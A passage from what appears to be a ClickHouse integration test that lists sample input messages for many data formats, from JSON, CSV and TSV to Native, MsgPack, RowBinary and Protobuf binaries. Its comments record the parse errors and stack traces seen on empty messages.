'{"id":"1","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"2","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"3","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"4","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"5","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"6","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"7","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"8","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"9","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"10","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"11","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"12","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"13","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"14","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"15","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n',
'{"id":"0","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n',
],
'supports_empty_value': True,
},
# JSONAsString doesn't fit to that test, and tested separately
'JSONCompactEachRow': {
'data_sample': [
'["0", 0, "AM", 0.5, 1]\n',
'["1", 0, "AM", 0.5, 1]\n["2", 0, "AM", 0.5, 1]\n["3", 0, "AM", 0.5, 1]\n["4", 0, "AM", 0.5, 1]\n["5", 0, "AM", 0.5, 1]\n["6", 0, "AM", 0.5, 1]\n["7", 0, "AM", 0.5, 1]\n["8", 0, "AM", 0.5, 1]\n["9", 0, "AM", 0.5, 1]\n["10", 0, "AM", 0.5, 1]\n["11", 0, "AM", 0.5, 1]\n["12", 0, "AM", 0.5, 1]\n["13", 0, "AM", 0.5, 1]\n["14", 0, "AM", 0.5, 1]\n["15", 0, "AM", 0.5, 1]\n',
'["0", 0, "AM", 0.5, 1]\n',
],
'supports_empty_value': True,
},
'JSONCompactEachRowWithNamesAndTypes': {
'data_sample': [
'["id", "blockNo", "val1", "val2", "val3"]\n["Int64", "UInt16", "String", "Float32", "UInt8"]\n["0", 0, "AM", 0.5, 1]\n',
'["id", "blockNo", "val1", "val2", "val3"]\n["Int64", "UInt16", "String", "Float32", "UInt8"]\n["1", 0, "AM", 0.5, 1]\n["2", 0, "AM", 0.5, 1]\n["3", 0, "AM", 0.5, 1]\n["4", 0, "AM", 0.5, 1]\n["5", 0, "AM", 0.5, 1]\n["6", 0, "AM", 0.5, 1]\n["7", 0, "AM", 0.5, 1]\n["8", 0, "AM", 0.5, 1]\n["9", 0, "AM", 0.5, 1]\n["10", 0, "AM", 0.5, 1]\n["11", 0, "AM", 0.5, 1]\n["12", 0, "AM", 0.5, 1]\n["13", 0, "AM", 0.5, 1]\n["14", 0, "AM", 0.5, 1]\n["15", 0, "AM", 0.5, 1]\n',
'["id", "blockNo", "val1", "val2", "val3"]\n["Int64", "UInt16", "String", "Float32", "UInt8"]\n["0", 0, "AM", 0.5, 1]\n',
# ''
# On empty message exception: Cannot parse input: expected '[' at end of stream., Stack trace (when copying this message, always include the lines below):
# /src/IO/ReadHelpers.h:175: DB::assertChar(char, DB::ReadBuffer&) @ 0x15db231a in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/JSONCompactEachRowRowInputFormat.cpp:0: DB::JSONCompactEachRowRowInputFormat::readPrefix() @ 0x1dee6bd6 in /usr/bin/clickhouse
# /src/Processors/Formats/IRowInputFormat.cpp:0: DB::IRowInputFormat::generate() @ 0x1de72710 in /usr/bin/clickhouse
],
},
'TSKV': {
'data_sample': [
'id=0\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\n',
'id=1\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=2\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=3\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=4\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=5\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=6\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=7\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=8\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=9\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=10\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=11\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=12\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=13\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=14\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=15\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\n',
'id=0\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\n',
# ''
# On empty message exception: Unexpected end of stream while reading key name from TSKV format
# /src/Processors/Formats/Impl/TSKVRowInputFormat.cpp:88: DB::readName(DB::ReadBuffer&, StringRef&, std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> >&) @ 0x1df8c098 in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/TSKVRowInputFormat.cpp:114: DB::TSKVRowInputFormat::readRow(std::__1::vector<COW<DB::IColumn>::mutable_ptr<DB::IColumn>, std::__1::allocator<COW<DB::IColumn>::mutable_ptr<DB::IColumn> > >&, DB::RowReadExtension&) @ 0x1df8ae3e in /usr/bin/clickhouse
# /src/Processors/Formats/IRowInputFormat.cpp:64: DB::IRowInputFormat::generate() @ 0x1de727cf in /usr/bin/clickhouse
],
},
'CSV': {
'data_sample': [
'0,0,"AM",0.5,1\n',
'1,0,"AM",0.5,1\n2,0,"AM",0.5,1\n3,0,"AM",0.5,1\n4,0,"AM",0.5,1\n5,0,"AM",0.5,1\n6,0,"AM",0.5,1\n7,0,"AM",0.5,1\n8,0,"AM",0.5,1\n9,0,"AM",0.5,1\n10,0,"AM",0.5,1\n11,0,"AM",0.5,1\n12,0,"AM",0.5,1\n13,0,"AM",0.5,1\n14,0,"AM",0.5,1\n15,0,"AM",0.5,1\n',
'0,0,"AM",0.5,1\n',
],
'supports_empty_value': True,
},
'TSV': {
'data_sample': [
'0\t0\tAM\t0.5\t1\n',
'1\t0\tAM\t0.5\t1\n2\t0\tAM\t0.5\t1\n3\t0\tAM\t0.5\t1\n4\t0\tAM\t0.5\t1\n5\t0\tAM\t0.5\t1\n6\t0\tAM\t0.5\t1\n7\t0\tAM\t0.5\t1\n8\t0\tAM\t0.5\t1\n9\t0\tAM\t0.5\t1\n10\t0\tAM\t0.5\t1\n11\t0\tAM\t0.5\t1\n12\t0\tAM\t0.5\t1\n13\t0\tAM\t0.5\t1\n14\t0\tAM\t0.5\t1\n15\t0\tAM\t0.5\t1\n',
'0\t0\tAM\t0.5\t1\n',
],
'supports_empty_value': True,
},
'CSVWithNames': {
'data_sample': [
'"id","blockNo","val1","val2","val3"\n0,0,"AM",0.5,1\n',
'"id","blockNo","val1","val2","val3"\n1,0,"AM",0.5,1\n2,0,"AM",0.5,1\n3,0,"AM",0.5,1\n4,0,"AM",0.5,1\n5,0,"AM",0.5,1\n6,0,"AM",0.5,1\n7,0,"AM",0.5,1\n8,0,"AM",0.5,1\n9,0,"AM",0.5,1\n10,0,"AM",0.5,1\n11,0,"AM",0.5,1\n12,0,"AM",0.5,1\n13,0,"AM",0.5,1\n14,0,"AM",0.5,1\n15,0,"AM",0.5,1\n',
'"id","blockNo","val1","val2","val3"\n0,0,"AM",0.5,1\n',
# '',
# On empty message exception happens: Attempt to read after eof
# /src/IO/VarInt.h:122: DB::throwReadAfterEOF() @ 0x15c34487 in /usr/bin/clickhouse
# /src/IO/ReadHelpers.cpp:583: void DB::readCSVStringInto<std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> > >(std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> >&, DB::ReadBuffer&, DB::FormatSettings::CSV const&) @ 0x15c961e1 in /usr/bin/clickhouse
# /src/IO/ReadHelpers.cpp:678: DB::readCSVString(std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> >&, DB::ReadBuffer&, DB::FormatSettings::CSV const&) @ 0x15c8dfae in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/CSVRowInputFormat.cpp:170: DB::CSVRowInputFormat::readPrefix() @ 0x1dec46f7 in /usr/bin/clickhouse
# /src/Processors/Formats/IRowInputFormat.cpp:0: DB::IRowInputFormat::generate() @ 0x1de72710 in /usr/bin/clickhouse
# /src/Processors/ISource.cpp:48: DB::ISource::work() @ 0x1dd79737 in /usr/bin/clickhouse
],
},
'Values': {
'data_sample': [
"(0,0,'AM',0.5,1)",
"(1,0,'AM',0.5,1),(2,0,'AM',0.5,1),(3,0,'AM',0.5,1),(4,0,'AM',0.5,1),(5,0,'AM',0.5,1),(6,0,'AM',0.5,1),(7,0,'AM',0.5,1),(8,0,'AM',0.5,1),(9,0,'AM',0.5,1),(10,0,'AM',0.5,1),(11,0,'AM',0.5,1),(12,0,'AM',0.5,1),(13,0,'AM',0.5,1),(14,0,'AM',0.5,1),(15,0,'AM',0.5,1)",
"(0,0,'AM',0.5,1)",
],
'supports_empty_value': True,
},
'TSVWithNames': {
'data_sample': [
'id\tblockNo\tval1\tval2\tval3\n0\t0\tAM\t0.5\t1\n',
'id\tblockNo\tval1\tval2\tval3\n1\t0\tAM\t0.5\t1\n2\t0\tAM\t0.5\t1\n3\t0\tAM\t0.5\t1\n4\t0\tAM\t0.5\t1\n5\t0\tAM\t0.5\t1\n6\t0\tAM\t0.5\t1\n7\t0\tAM\t0.5\t1\n8\t0\tAM\t0.5\t1\n9\t0\tAM\t0.5\t1\n10\t0\tAM\t0.5\t1\n11\t0\tAM\t0.5\t1\n12\t0\tAM\t0.5\t1\n13\t0\tAM\t0.5\t1\n14\t0\tAM\t0.5\t1\n15\t0\tAM\t0.5\t1\n',
'id\tblockNo\tval1\tval2\tval3\n0\t0\tAM\t0.5\t1\n',
],
'supports_empty_value': True,
},
'TSVWithNamesAndTypes': {
'data_sample': [
'id\tblockNo\tval1\tval2\tval3\nInt64\tUInt16\tString\tFloat32\tUInt8\n0\t0\tAM\t0.5\t1\n',
'id\tblockNo\tval1\tval2\tval3\nInt64\tUInt16\tString\tFloat32\tUInt8\n1\t0\tAM\t0.5\t1\n2\t0\tAM\t0.5\t1\n3\t0\tAM\t0.5\t1\n4\t0\tAM\t0.5\t1\n5\t0\tAM\t0.5\t1\n6\t0\tAM\t0.5\t1\n7\t0\tAM\t0.5\t1\n8\t0\tAM\t0.5\t1\n9\t0\tAM\t0.5\t1\n10\t0\tAM\t0.5\t1\n11\t0\tAM\t0.5\t1\n12\t0\tAM\t0.5\t1\n13\t0\tAM\t0.5\t1\n14\t0\tAM\t0.5\t1\n15\t0\tAM\t0.5\t1\n',
'id\tblockNo\tval1\tval2\tval3\nInt64\tUInt16\tString\tFloat32\tUInt8\n0\t0\tAM\t0.5\t1\n',
# '',
# On empty message exception happens: Cannot parse input: expected '\n' at end of stream.
# /src/IO/ReadHelpers.cpp:84: DB::throwAtAssertionFailed(char const*, DB::ReadBuffer&) @ 0x15c8d8ec in /usr/bin/clickhouse
# /src/IO/ReadHelpers.h:175: DB::assertChar(char, DB::ReadBuffer&) @ 0x15db231a in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/TabSeparatedRowInputFormat.cpp:24: DB::skipTSVRow(DB::ReadBuffer&, unsigned long) @ 0x1df92fac in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/TabSeparatedRowInputFormat.cpp:168: DB::TabSeparatedRowInputFormat::readPrefix() @ 0x1df92df0 in /usr/bin/clickhouse
# /src/Processors/Formats/IRowInputFormat.cpp:0: DB::IRowInputFormat::generate() @ 0x1de72710 in /usr/bin/clickhouse
],
},
# 'Template' : {
# 'data_sample' : [
# '(id = 0, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)',
# # '(id = 1, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 2, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 3, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 4, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 5, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 6, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 7, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 8, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 9, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 10, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 11, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 12, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 13, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 14, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 15, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)',
# # '(id = 0, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)',
# # '' # tolerates
# ],
# 'extra_settings': ", format_template_row='template_row.format'"
# },
'Regexp': {
'data_sample': [
'(id = 0, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)',
'(id = 1, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 2, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 3, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 4, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 5, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 6, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 7, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 8, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 9, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 10, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 11, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 12, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 13, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 14, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 15, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)',
'(id = 0, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)',
# ''
# On empty message exception happens: Line "" doesn't match the regexp.: (at row 1)
# /src/Processors/Formats/Impl/RegexpRowInputFormat.cpp:140: DB::RegexpRowInputFormat::readRow(std::__1::vector<COW<DB::IColumn>::mutable_ptr<DB::IColumn>, std::__1::allocator<COW<DB::IColumn>::mutable_ptr<DB::IColumn> > >&, DB::RowReadExtension&) @ 0x1df82fcb in /usr/bin/clickhouse
],
'extra_settings': r", format_regexp='\(id = (.+?), blockNo = (.+?), val1 = \"(.+?)\", val2 = (.+?), val3 = (.+?)\)', format_regexp_escaping_rule='Escaped'"
},
## BINARY FORMATS
# dumped with
# clickhouse-client ... | xxd -ps -c 200 | tr -d '\n' | sed 's/\(..\)/\\x\1/g'
'Native': {
'data_sample': [
b'\x05\x01\x02\x69\x64\x05\x49\x6e\x74\x36\x34\x00\x00\x00\x00\x00\x00\x00\x00\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x06\x55\x49\x6e\x74\x31\x36\x00\x00\x04\x76\x61\x6c\x31\x06\x53\x74\x72\x69\x6e\x67\x02\x41\x4d\x04\x76\x61\x6c\x32\x07\x46\x6c\x6f\x61\x74\x33\x32\x00\x00\x00\x3f\x04\x76\x61\x6c\x33\x05\x55\x49\x6e\x74\x38\x01',
b'\x05\x0f\x02\x69\x64\x05\x49\x6e\x74\x36\x34\x01\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x0d\x00\x00\x00\x00\x00\x00\x00\x0e\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x06\x55\x49\x6e\x74\x31\x36\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x76\x61\x6c\x31\x06\x53\x74\x72\x69\x6e\x67\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x04\x76\x61\x6c\x32\x07\x46\x6c\x6f\x61\x74\x33\x32\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x04\x76\x61\x6c\x33\x05\x55\x49\x6e\x74\x38\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01',
b'\x05\x01\x02\x69\x64\x05\x49\x6e\x74\x36\x34\x00\x00\x00\x00\x00\x00\x00\x00\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x06\x55\x49\x6e\x74\x31\x36\x00\x00\x04\x76\x61\x6c\x31\x06\x53\x74\x72\x69\x6e\x67\x02\x41\x4d\x04\x76\x61\x6c\x32\x07\x46\x6c\x6f\x61\x74\x33\x32\x00\x00\x00\x3f\x04\x76\x61\x6c\x33\x05\x55\x49\x6e\x74\x38\x01',
# ''
# On empty message exception happens: DB::Exception: Attempt to read after eof
# /src/IO/VarInt.h:122: DB::throwReadAfterEOF() @ 0x15c34487 in /usr/bin/clickhouse
# /src/IO/VarInt.h:135: void DB::readVarUIntImpl<false>(unsigned long&, DB::ReadBuffer&) @ 0x15c68bb7 in /usr/bin/clickhouse
# /src/IO/VarInt.h:149: DB::readVarUInt(unsigned long&, DB::ReadBuffer&) @ 0x15c68844 in /usr/bin/clickhouse
# /src/DataStreams/NativeBlockInputStream.cpp:124: DB::NativeBlockInputStream::readImpl() @ 0x1d3e2778 in /usr/bin/clickhouse
# /src/DataStreams/IBlockInputStream.cpp:60: DB::IBlockInputStream::read() @ 0x1c9c92fd in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/NativeFormat.h:42: DB::NativeInputFormatFromNativeBlockInputStream::generate() @ 0x1df1ea79 in /usr/bin/clickhouse
# /src/Processors/ISource.cpp:48: DB::ISource::work() @ 0x1dd79737 in /usr/bin/clickhouse
],
},
'MsgPack': {
'data_sample': [
b'\x00\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01',
b'\x01\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x02\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x03\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x04\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x05\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x06\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x07\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x08\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x09\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x0a\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x0b\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x0c\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x0d\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x0e\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x0f\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01',
b'\x00\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01',
# ''
# On empty message exception happens: Unexpected end of file while parsing msgpack object.: (at row 1)
# coming from Processors/Formats/Impl/MsgPackRowInputFormat.cpp:170
],
},
'RowBinary': {
'data_sample': [
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
b'\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x09\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
# ''
# On an empty message this exception occurs: DB::Exception: Cannot read all data. Bytes read: 0. Bytes expected: 8.
# /src/IO/ReadBuffer.h:157: DB::ReadBuffer::readStrict(char*, unsigned long) @ 0x15c6894d in /usr/bin/clickhouse
# /src/IO/ReadHelpers.h:108: void DB::readPODBinary<long>(long&, DB::ReadBuffer&) @ 0x15c67715 in /usr/bin/clickhouse
# /src/IO/ReadHelpers.h:737: std::__1::enable_if<is_arithmetic_v<long>, void>::type DB::readBinary<long>(long&, DB::ReadBuffer&) @ 0x15e7afbd in /usr/bin/clickhouse
# /src/DataTypes/DataTypeNumberBase.cpp:180: DB::DataTypeNumberBase<long>::deserializeBinary(DB::IColumn&, DB::ReadBuffer&) const @ 0x1cace581 in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/BinaryRowInputFormat.cpp:22: DB::BinaryRowInputFormat::readRow(std::__1::vector<COW<DB::IColumn>::mutable_ptr<DB::IColumn>, std::__1::allocator<COW<DB::IColumn>::mutable_ptr<DB::IColumn> > >&, DB::RowReadExtension&) @ 0x1dea2c0b in /usr/bin/clickhouse
],
},
'RowBinaryWithNamesAndTypes': {
'data_sample': [
b'\x05\x02\x69\x64\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x04\x76\x61\x6c\x31\x04\x76\x61\x6c\x32\x04\x76\x61\x6c\x33\x05\x49\x6e\x74\x36\x34\x06\x55\x49\x6e\x74\x31\x36\x06\x53\x74\x72\x69\x6e\x67\x07\x46\x6c\x6f\x61\x74\x33\x32\x05\x55\x49\x6e\x74\x38\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
b'\x05\x02\x69\x64\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x04\x76\x61\x6c\x31\x04\x76\x61\x6c\x32\x04\x76\x61\x6c\x33\x05\x49\x6e\x74\x36\x34\x06\x55\x49\x6e\x74\x31\x36\x06\x53\x74\x72\x69\x6e\x67\x07\x46\x6c\x6f\x61\x74\x33\x32\x05\x55\x49\x6e\x74\x38\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x09\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
b'\x05\x02\x69\x64\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x04\x76\x61\x6c\x31\x04\x76\x61\x6c\x32\x04\x76\x61\x6c\x33\x05\x49\x6e\x74\x36\x34\x06\x55\x49\x6e\x74\x31\x36\x06\x53\x74\x72\x69\x6e\x67\x07\x46\x6c\x6f\x61\x74\x33\x32\x05\x55\x49\x6e\x74\x38\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
# ''
# !!! On an empty message a segfault occurs: Address not mapped to object
# /contrib/FastMemcpy/FastMemcpy.h:666: memcpy_fast @ 0x21742d65 in /usr/bin/clickhouse
# /contrib/FastMemcpy/memcpy_wrapper.c:5: memcpy @ 0x21738235 in /usr/bin/clickhouse
# /src/IO/ReadBuffer.h:145: DB::ReadBuffer::read(char*, unsigned long) @ 0x15c369d7 in /usr/bin/clickhouse
# /src/IO/ReadBuffer.h:155: DB::ReadBuffer::readStrict(char*, unsigned long) @ 0x15c68878 in /usr/bin/clickhouse
# /src/DataTypes/DataTypeString.cpp:84: DB::DataTypeString::deserializeBinary(DB::IColumn&, DB::ReadBuffer&) const @ 0x1cad12e7 in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/BinaryRowInputFormat.cpp:22: DB::BinaryRowInputFormat::readRow(std::__1::vector<COW<DB::IColumn>::mutable_ptr<DB::IColumn>, std::__1::allocator<COW<DB::IColumn>::mutable_ptr<DB::IColumn> > >&, DB::RowReadExtension&) @ 0x1dea2c0b in /usr/bin/clickhouse
],
},
'Protobuf': {
'data_sample': [
b'\x0b\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01',
b'\x0d\x08\x01\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x02\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x03\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x04\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x05\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x06\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x07\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x08\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x09\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x0a\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x0b\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x0c\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x0d\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x0e\x1a\x02\x41\x4d\x25\x00\x00\x